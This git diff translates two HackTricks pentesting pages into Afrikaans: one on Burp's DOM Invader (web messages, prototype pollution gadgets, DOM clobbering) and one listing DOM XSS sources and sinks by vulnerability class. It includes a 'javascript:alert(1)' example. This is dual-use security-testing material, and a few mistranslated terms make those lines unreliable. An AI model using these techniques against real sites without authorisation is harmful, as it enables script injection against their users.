-DOM Invader allows testing for DOM XSS using web messages with features such as:
+DOM Invader maak dit moontlik om DOM XSS te toets deur gebruik te maak van webboodskappe met funksies soos:
 
-1. **Logging web messages** sent via `postMessage()`, akin to Burp Proxy's HTTP request/response history logging.
-2. **Modification** and **reissue** of web messages to manually test for DOM XSS, similar to Burp Repeater's function.
-3. **Automatic alteration** and sending of web messages for probing DOM XSS.
+1. **Log webboodskappe** wat gestuur word via `postMessage()`, soortgelyk aan Burp Proxy se HTTP-versoek-/reaksiegeskiedenislogboek.
+2. **Wysiging** en **heruitreiking** van webboodskappe om handmatig te toets vir DOM XSS, soortgelyk aan Burp Repeater se funksie.
+3. **Outomatiese verandering** en stuur van webboodskappe vir die sondering van DOM XSS.
 
-#### Message details
+#### Boodskapbesonderhede
 
-Detailed information can be viewed about each message by clicking on it, which includes whether the client-side JavaScript accesses the `origin`, `data`, or `source` properties of the message.
+Gedetailleerde inligting oor elke boodskap kan besigtig word deur daarop te klik, wat insluit of die kliëntkant JavaScript die `origin`, `data` of `source` eienskappe van die boodskap benader.
 
-* **`origin`** : If the **origin information of the message is not check**, you may be able to send cross-origin messages to the event handler **from an arbitrary external domain**. But if it's checked it still could be insecure.
-* **`data`**: This is where the payload is sent. If this data is not used, the sink is useless.
-* **`source`**: Evaluates if the source property, usually referencing an iframe, is validated instead of the origin. Even if this is checked, it doesn't assure the validation can't be bypassed.
+* **`origin`**: As die **oorsprongsinligting van die boodskap nie nagegaan word nie**, kan jy dalk kruisoorsprong-boodskappe na die gebeurtenishanterer stuur **vanaf 'n willekeurige eksterne domein**. Maar as dit nagegaan word, kan dit steeds onveilig wees.
+* **`data`**: Hierdie is waar die payload gestuur word. As hierdie data nie gebruik word nie, is die sap nutteloos.
+* **`source`**: Evalueer of die bron-eienskap, wat gewoonlik na 'n iframe verwys, geverifieer word in plaas van die oorsprong. Selfs as dit nagegaan word, verseker dit nie dat die verifikasie omseil kan word nie.
 
-#### Reply a message
+#### Antwoord op 'n boodskap
 
-1. From the **Messages** view, click on any message to open the message details dialog.
-2. Edit the **Data** field as required.
-3. Click **Send**.
+1. Klik op enige boodskap in die **Boodskappe**-sig om die besonderhededialoog van die boodskap oop te maak.
+2. Wysig die **Data**-veld soos vereis.
+3. Klik op **Stuur**.
 
-### Prototype Pollution
+### Prototipevervuiling
 
-DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
+DOM Invader kan ook soek na **Prototipevervuiling-gebreklikhede**. Eerstens moet jy dit aktiveer:
 
 

 
-Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
-
-If anything is found a **Test** button will appear to **test the found source**. Click on it, a new tab will appear, create an object in the console and check if the `testproperty` exists:
+Dan sal dit **soek na bronne** wat jou in staat stel om arbitrêre eienskappe by die **`Object.prototype`** te voeg.
 
+As iets gevind word, sal 'n **Toets**-knoppie verskyn om die gevonde bron te **toets**. Klik daarop, 'n nuwe oortjie sal verskyn, skep 'n voorwerp in die konsole en kyk of die `testproperty` bestaan:
 ```javascript
 let b = {}
 b.testproperty
 ```
+Sodra jy 'n bron gevind het, kan jy **soek vir 'n gadget**:
 
-Once you found a source you can **scan for a gadget**:
+1. 'n Nuwe oortjie word deur DOM Invader geopen wanneer die **Soek vir gadgets**-knoppie, wat langs enige geïdentifiseerde prototipevervuilingsbron in die **DOM**-sigbaarheid gevind kan word, gekliek word. Die soektog na geskikte gadgets begin dan.
+2. Intussen, in dieselfde oortjie, moet die **DOM Invader**-oortjie in die DevTools-paneel geopen word. Nadat die soektog voltooi is, word enige lekke wat toeganklik is via die geïdentifiseerde gadgets in die **DOM**-sigbaarheid vertoon. Byvoorbeeld, 'n gadget-eienskap genaamd `html` wat aan die `innerHTML`-lek oorgedra word, word in die voorbeeld hieronder getoon.
 
-1. A new tab is opened by DOM Invader when the **Scan for gadgets** button, which can be found next to any identified prototype pollution source in the **DOM** view, is clicked. The scanning for suitable gadgets then begins.
-2. Meanwhile, in the same tab, the **DOM Invader** tab should be opened in the DevTools panel. After the scan completes, any sinks accessible via the identified gadgets are displayed in the **DOM** view. For instance, a gadget property named `html` being passed to the `innerHTML` sink is shown in the example below.
+## DOM-vervuiling
 
-## DOM clobbering
+In die vorige prentjie is dit moontlik om te sien dat die soektog na DOM-vervuilings aangeskakel kan word. Sodra dit gedoen is, sal **DOM Invader begin soek na DOM-vervuilbaarhede**.
 
-In the previous image it's possible to see that DOM clobbering scan can be turned on. Once done, **DOM Invader will start searching for DOM clobbering vulnerabilities**.
-
-## References
+## Verwysings
 
 * [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
 * [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling)
@@ -102,14 +100,14 @@ In the previous image it's possible to see that DOM clobbering scan can be turne
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 324d7c32c..6154403b9 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -2,31 +2,30 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

 
-## DOM Vulnerabilities
+## DOM Kwesbaarhede
 
-DOM vulnerabilities occur when data from attacker-controlled **sources** (like `location.search`, `document.referrer`, or `document.cookie`) is unsafely transferred to **sinks**. Sinks are functions or objects (e.g., `eval()`, `document.body.innerHTML`) that can execute or render harmful content if given malicious data.
+DOM-kwesbaarhede kom voor wanneer data vanaf aanvaller-beheerde **bronne** (soos `location.search`, `document.referrer`, of `document.cookie`) onveilig oorgedra word na **sinks**. Sinks is funksies of objekte (bv. `eval()`, `document.body.innerHTML`) wat skadelike inhoud kan uitvoer of vertoon as dit kwaadwillige data ontvang.
 
-- **Sources** are inputs that can be manipulated by attackers, including URLs, cookies, and web messages.
-- **Sinks** are potentially dangerous endpoints where malicious data can lead to adverse effects, such as script execution.
+- **Bronne** is insette wat deur aanvallers gemanipuleer kan word, insluitend URL's, koekies, en webboodskappe.
+- **Sinks** is potensieel gevaarlike eindpunte waar kwaadwillige data kan lei tot nadelige gevolge, soos skripsie-uitvoering.
 
-The risk arises when data flows from a source to a sink without proper validation or sanitation, enabling attacks like XSS.
+Die risiko ontstaan wanneer data vanaf 'n bron na 'n sink vloei sonder behoorlike validering of sanitisering, wat aanvalle soos XSS moontlik maak.
 
 {% hint style="info" %}
-**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)
+**Jy kan 'n meer bygewerkte lys van bronne en sinks vind in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)
 {% endhint %}
 
-**Common sources:**
-
+**Gewone bronne:**
 ```javascript
 document.URL
 document.documentURI
@@ -43,13 +42,12 @@ sessionStorage
 IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
 Database
 ```
+**Gewone Sinks:**
 
-**Common Sinks:**
-
-| [**Open Redirect**](dom-xss.md#open-redirect)                                    | [**Javascript Injection**](dom-xss.md#javascript-injection)                         | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation) | **jQuery**                                                             |
+| [**Oop Herlei**](dom-xss.md#open-redirect)                                    | [**Javascript Injeksie**](dom-xss.md#javascript-injection)                         | [**DOM-data manipulasie**](dom-xss.md#dom-data-manipulation) | **jQuery**                                                             |
 | -------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- | ------------------------------------------------------------- | ---------------------------------------------------------------------- |
 | `location`                                                                       | `eval()`                                                                            | `scriptElement.src`                                           | `add()`                                                                |
-| `location.host`                                                                  | `Function() constructor`                                                            | `scriptElement.text`                                          | `after()`                                                              |
+| `location.host`                                                                  | `Function() konstrukteur`                                                            | `scriptElement.text`                                          | `after()`                                                              |
 | `location.hostname`                                                              | `setTimeout()`                                                                      | `scriptElement.textContent`                                   | `append()`                                                             |
 | `location.href`                                                                  | `setInterval()`                                                                     | `scriptElement.innerText`                                     | `animate()`                                                            |
 | `location.pathname`                                                              | `setImmediate()`                                                                    | `someDOMElement.setAttribute()`                               | `insertAfter()`                                                        |
@@ -58,46 +56,45 @@ Database
 | `location.assign()`                                                              | `msSetImmediate()`                                                                  | `someDOMElement.textContent`                                  | `html()`                                                               |
 | `location.replace()`                                                             | `range.createContextualFragment()`                                                  | `someDOMElement.innerText`                                    | `prepend()`                                                            |
 | `open()`                                                                         | `crypto.generateCRMFRequest()`                                                      | `someDOMElement.outerText`                                    | `replaceAll()`                                                         |
-| `domElem.srcdoc`                                                                 | **\`\`**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value`                                        | `replaceWith()`                                                        |
+| `domElem.srcdoc`                                                                 | **\`\`**[**Plaaslike lêerpad manipulasie**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value`                                        | `replaceWith()`                                                        |
 | `XMLHttpRequest.open()`                                                          | `FileReader.readAsArrayBuffer()`                                                    | `someDOMElement.name`                                         | `wrap()`                                                               |
 | `XMLHttpRequest.send()`                                                          | `FileReader.readAsBinaryString()`                                                   | `someDOMElement.target`                                       | `wrapInner()`                                                          |
 | `jQuery.ajax()`                                                                  | `FileReader.readAsDataURL()`                                                        | `someDOMElement.method`                                       | `wrapAll()`                                                            |
 | `$.ajax()`                                                                       | `FileReader.readAsText()`                                                           | `someDOMElement.type`                                         | `has()`                                                                |
-| **\`\`**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation)    | `FileReader.readAsFile()`                                                           | `someDOMElement.backgroundImage`                              | `constructor()`                                                        |
+| **\`\`**[**Ajax versoek manipulasie**](dom-xss.md#ajax-request-manipulation)    | `FileReader.readAsFile()`                                                           | `someDOMElement.backgroundImage`                              | `constructor()`                                                        |
 | `XMLHttpRequest.setRequestHeader()`                                              | `FileReader.root.getFile()`                                                         | `someDOMElement.cssText`                                      | `init()`                                                               |
 | `XMLHttpRequest.open()`                                                          | `FileReader.root.getFile()`                                                         | `someDOMElement.codebase`                                     | `index()`                                                              |
-| `XMLHttpRequest.send()`                                                          | [**Link manipulation**](dom-xss.md#link-manipulation)                               | `someDOMElement.innerHTML`                                    | `jQuery.parseHTML()`                                                   |
+| `XMLHttpRequest.send()`                                                          | [**Skakel manipulasie**](dom-xss.md#link-manipulation)                               | `someDOMElement.innerHTML`                                    | `jQuery.parseHTML()`                                                   |
 | `jQuery.globalEval()`                                                            | `someDOMElement.href`                                                               | `someDOMElement.outerHTML`                                    | `$.parseHTML()`                                                        |
-| `$.globalEval()`                                                                 | `someDOMElement.src`                                                                | `someDOMElement.insertAdjacentHTML`                           | [**Client-side JSON injection**](dom-xss.md#client-side-sql-injection) |
-| **\`\`**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action`                                                             | `someDOMElement.onevent`                                      | `JSON.parse()`                                                         |
-| `sessionStorage.setItem()`                                                       | [**XPath injection**](dom-xss.md#xpath-injection)                                   | `document.write()`                                            | `jQuery.parseJSON()`                                                   |
+| `$.globalEval()`                                                                 | `someDOMElement.src`                                                                | `someDOMElement.insertAdjacentHTML`                           | [**Kliëntkant JSON injeksie**](dom-xss.md#client-side-sql-injection) |
+| **\`\`**[**HTML5-opberg manipulasie**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action`                                                             | `someDOMElement.onevent`                                      | `JSON.parse()`                                                         |
+| `sessionStorage.setItem()`                                                       | [**XPath injeksie**](dom-xss.md#xpath-injection)                                   | `document.write()`                                            | `jQuery.parseJSON()`                                                   |
 | `localStorage.setItem()`                                                         | `document.evaluate()`                                                               | `document.writeln()`                                          | `$.parseJSON()`                                                        |
-| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``**              | `someDOMElement.evaluate()`                                                         | `document.title`                                              | **\`\`**[**Cookie manipulation**](dom-xss.md#cookie-manipulation)      |
-| `requestFileSystem()`                                                            | **\`\`**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()`                | `document.cookie`                                                      |
-| `RegExp()`                                                                       | `document.domain`                                                                   | `history.pushState()`                                         | [**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning)      |
-| [**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection)            | [**Web-message manipulation**](dom-xss.md#web-message-manipulation)                 | `history.replaceState()`                                      | `WebSocket`                                                            |
+| **``**[**`Dienste weier`**](dom-xss.md#denial-of-service)**``**              | `someDOMElement.evaluate()`                                                         | `document.title`                                              | **\`\`**[**Koekie manipulasie**](dom-xss.md#cookie-manipulation)      |
+| `requestFileSystem()`                                                            | **\`\`**[**Dokument-domein manipulasie**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()`                | `document.cookie`                                                      |
+| `RegExp()`                                                                       | `document.domain`                                                                   | `history.pushState()`                                         | [**WebSocket-URL vergiftiging**](dom-xss.md#websocket-url-poisoning)      |
+| [**Kliëntkant SQL injeksie**](dom-xss.md#client-side-sql-injection)            | [**Web-boodskap manipulasie**](dom-xss.md#web-message-manipulation)                 | `history.replaceState()`                                      | `WebSocket`                                                            |
 | `executeSql()`                                                                   | `postMessage()`                                                                     | \`\`                                                          | \`\`                                                                   |
 
-The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`.
+Die **`innerHTML`** sink aanvaar nie `script` elemente op enige moderne blaaier nie, en `svg onload` gebeure sal ook nie plaasvind nie. Dit beteken dat jy alternatiewe elemente soos `img` of `iframe` sal moet gebruik.
 
-This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS.
+Hierdie tipe XSS is waarskynlik die **moeilikste om te vind**, aangesien jy binne-in die JS-kode moet kyk, sien of dit enige objek gebruik waarvan jy die waarde beheer, en in daardie geval sien of daar enige manier is om dit te misbruik om willekeurige JS uit te voer.
 
-## Tools to find them
+## Gereedskap om hulle te vind
 
 * [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized)
 
-## Examples
+## Voorbeelde
 
-### Open Redirect
+### Oop Herlei
 
-From: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection)
+Van: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection)
 
-**Open redirect vulnerabilities in the DOM** occur when a script writes data, which an attacker can control, into a sink capable of initiating navigation across domains.
+**Oop herlei kwesbaarhede in die DOM** kom voor wanneer 'n skripsie data skryf, wat 'n aanvaller kan beheer, na 'n sink wat in staat is om navigasie oor domeine te begin.
 
-It's crucial to understand that executing arbitrary code, such as **`javascript:alert(1)`**, is possible if you have control over the start of the URL where the redirection occurs.
+Dit is van kritieke belang om te verstaan dat die uitvoering van willekeurige kode, soos **`javascript:alert(1)`**, moontlik is as jy beheer het oor die begin van die URL waar die herleiding plaasvind.
 
 Sinks:
-
 ```javascript
 location
 location.host
@@ -115,27 +112,23 @@ XMLHttpRequest.send()
 jQuery.ajax()
 $.ajax()
 ```
+### Koekie manipulasie
 
-### Cookie manipulation
+Vanaf: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
-
-DOM-based cookie-manipulation vulnerabilities occur when a script incorporates data, which can be controlled by an attacker, into the value of a cookie. This vulnerability can lead to unexpected behavior of the webpage if the cookie is utilized within the site. Additionally, it can be exploited to carry out a session fixation attack if the cookie is involved in tracking user sessions. The primary sink associated with this vulnerability is:
+DOM-gebaseerde koekie-manipulasie kwesbaarhede kom voor wanneer 'n skripsie data insluit, wat deur 'n aanvaller beheer kan word, in die waarde van 'n koekie. Hierdie kwesbaarheid kan lei tot onverwagte gedrag van die webbladsy as die koekie binne die webwerf gebruik word. Daarbenewens kan dit uitgebuit word om 'n sessie-fixatie-aanval uit te voer as die koekie betrokke is by die volg van gebruikersessies. Die primêre sink wat met hierdie kwesbaarheid geassosieer word, is:
 
 Sinks:
-
 ```javascript
 document.cookie
 ```
+### JavaScript Injeksie
 
-### JavaScript Injection
+Vanaf: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection)
 
-From: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection)
-
-DOM-based JavaScript injection vulnerabilities are created when a script runs data, which can be controlled by an attacker, as JavaScript code.
+DOM-gebaseerde JavaScript-injeksiekwesbaarhede word geskep wanneer 'n skrips data uitvoer, wat deur 'n aanvaller beheer kan word, as JavaScript-kode.
 
 Sinks:
-
 ```javascript
 eval()
 Function() constructor
@@ -148,53 +141,47 @@ msSetImmediate()
 range.createContextualFragment()
 crypto.generateCRMFRequest()
 ```
+### Dokument-domein manipulasie
 
-### Document-domain manipulation
+Vanaf: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
+**Dokument-domein manipulasie kwesbaarhede** kom voor wanneer 'n skripsie die `document.domain` eienskap stel deur gebruik te maak van data wat 'n aanvaller kan beheer.
 
-**Document-domain manipulation vulnerabilities** occur when a script sets the `document.domain` property using data that an attacker can control.
-
-The `document.domain` property plays a **key role** in the **enforcement** of the **same-origin policy** by browsers. When two pages from different origins set their `document.domain` to the **same value**, they can interact without restrictions. Although browsers impose certain **limits** on the values assignable to `document.domain`, preventing the assignment of completely unrelated values to the actual page origin, exceptions exist. Typically, browsers permit the use of **child** or **parent domains**.
+Die `document.domain` eienskap speel 'n **sleutelrol** in die **handhawing** van die **selfde-oorsprong beleid** deur webblaaier. Wanneer twee bladsye vanaf verskillende oorspronge hul `document.domain` na dieselfde waarde stel, kan hulle sonder beperkings met mekaar interaksie hê. Alhoewel webblaaier sekere **grense** opleg op die waardes wat toegewys kan word aan `document.domain`, om die toewysing van heeltemal onverwante waardes aan die werklike bladsy-oorsprong te voorkom, bestaan daar uitsonderings. Gewoonlik laat webblaaier die gebruik van **kind** of **ouer domeine** toe.
 
 Sinks:
-
 ```javascript
 document.domain
 ```
+### WebSocket-URL vergiftiging
 
-### WebSocket-URL poisoning
+Van: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
 
-From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
-
-**WebSocket-URL poisoning** occurs when a script utilizes **controllable data as the target URL** for a WebSocket connection.
+**WebSocket-URL vergiftiging** vind plaas wanneer 'n skrip **beheerbare data as die teiken-URL** vir 'n WebSocket-verbinding gebruik.
 
 Sinks:
 
-The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities.
+Die `WebSocket` konstrukteur kan lei tot WebSocket-URL vergiftigingskwesbaarhede.
 
-### Link manipulation
+### Skakel manipulasie
 
-From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
+Van: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
 
-**DOM-based link-manipulation vulnerabilities** arise when a script writes **attacker-controllable data to a navigation target** within the current page, such as a clickable link or the submission URL of a form.
+**DOM-gebaseerde skakel-manipulasiekwesbaarhede** ontstaan wanneer 'n skrip **aanvaller-beheerbare data na 'n navigasie-teiken** binne die huidige bladsy skryf, soos 'n kliekbare skakel of die indienings-URL van 'n vorm.
 
 Sinks:
-
 ```javascript
 someDOMElement.href
 someDOMElement.src
 someDOMElement.action
 ```
+### Ajax versoek manipulasie
 
-### Ajax request manipulation
+Vanaf: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
-
-**Ajax request manipulation vulnerabilities** arise when a script writes **attacker-controllable data into an Ajax request** that is issued using an `XmlHttpRequest` object.
+**Ajax versoek manipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data in 'n Ajax versoek skryf** wat uitgereik word met behulp van 'n `XmlHttpRequest` objek.
 
 Sinks:
-
 ```javascript
 XMLHttpRequest.setRequestHeader()
 XMLHttpRequest.open()
@@ -202,15 +189,13 @@ XMLHttpRequest.send()
 jQuery.globalEval()
 $.globalEval()
 ```
+### Plaaslike lêerpad-manipulasie
 
-### Local file-path manipulation
+Van: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
-
-**Local file-path manipulation vulnerabilities** arise when a script passes **attacker-controllable data to a file-handling API** as the `filename` parameter. This vulnerability can be exploited by an attacker to construct a URL that, if visited by another user, could lead to the **user's browser opening or writing an arbitrary local file**.
+**Plaaslike lêerpad-manipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data aan 'n lêerhanterings-API** deurgee as die `filename` parameter. Hierdie kwesbaarheid kan deur 'n aanvaller uitgebuit word om 'n URL te konstrueer wat, as dit deur 'n ander gebruiker besoek word, kan lei tot die **gebruiker se blaaier wat 'n willekeurige plaaslike lêer oopmaak of skryf**.
 
 Sinks:
-
 ```javascript
 FileReader.readAsArrayBuffer()
 FileReader.readAsBinaryString()
@@ -220,77 +205,67 @@ FileReader.readAsFile()
 FileReader.root.getFile()
 FileReader.root.getFile()
 ```
+### Kliëntkant SQL-inspuiting
 
-### Client-Side SQl injection
+Van: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
 
-From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
-
-**Client-side SQL-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into a client-side SQL query in an unsafe way**.
-
-Sinks: 
+**Kliëntkant SQL-inspuitingskwetsbaarhede** kom voor wanneer 'n skripsie **aanvaller-beheerbare data op 'n onveilige manier in 'n kliëntkant SQL-navraag inkorporeer**.
 
+Sinks:
 ```javascript
 executeSql()
 ```
+### HTML5-opbergingsmanipulasie
 
-### HTML5-storage manipulation
+Van: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation)
-
-**HTML5-storage manipulation vulnerabilities** arise when a script **stores attacker-controllable data in the web browser's HTML5 storage** (`localStorage` or `sessionStorage`). While this action is not inherently a security vulnerability, it becomes problematic if the application subsequently **reads the stored data and processes it unsafely**. This could allow an attacker to leverage the storage mechanism to conduct other DOM-based attacks, such as cross-site scripting and JavaScript injection.
+**HTML5-opbergingsmanipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data in die webblaaier se HTML5-opberging** (`localStorage` of `sessionStorage`) stoor. Alhoewel hierdie aksie nie inherent 'n sekuriteitskwesbaarheid is nie, word dit problematies as die toepassing vervolgens **die gestoorde data lees en dit onveilig verwerk**. Dit kan 'n aanvaller in staat stel om die opbergingsmeganisme te gebruik om ander DOM-gebaseerde aanvalle uit te voer, soos kruissite-skripsing en JavaScript-inspuiting.
 
 Sinks:
-
 ```javascript
 sessionStorage.setItem()
 localStorage.setItem()
 ```
+### XPath-inspuiting
 
-### XPath injection
+Vanaf: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection)
 
-From: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection)
-
-**DOM-based XPath-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into an XPath query**.
+**DOM-gebaseerde XPath-inspuitingskwetsbaarheden** kom voor wanneer 'n skripsie **aanvaller-beheerbare data in 'n XPath-navraag** inkorporeer.
 
 Sinks:
-
 ```javascript
 document.evaluate()
 someDOMElement.evaluate()
 ```
+### Kliëntkant JSON-injeksie
 
-### Client-side JSON injection
+Vanaf: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
 
-From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
-
-**DOM-based JSON-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application**.
+**DOM-gebaseerde JSON-injeksie kwesbaarhede** kom voor wanneer 'n skripsie **aanvaller-beheerbare data inkorporeer in 'n string wat as 'n JSON-datastruktuur geïnterpreteer word en dan deur die toepassing verwerk word**.
 
 Sinks:
-
 ```javascript
 JSON.parse()
 jQuery.parseJSON()
 $.parseJSON()
 ```
+### Web-boodskap manipulasie
 
-### Web-message manipulation
+Vanaf: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
-
-**Web-message vulnerabilities** arise when a script sends **attacker-controllable data as a web message to another document** within the browser. An **example** of vulnerable Web-message manipulation can be found at [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source).
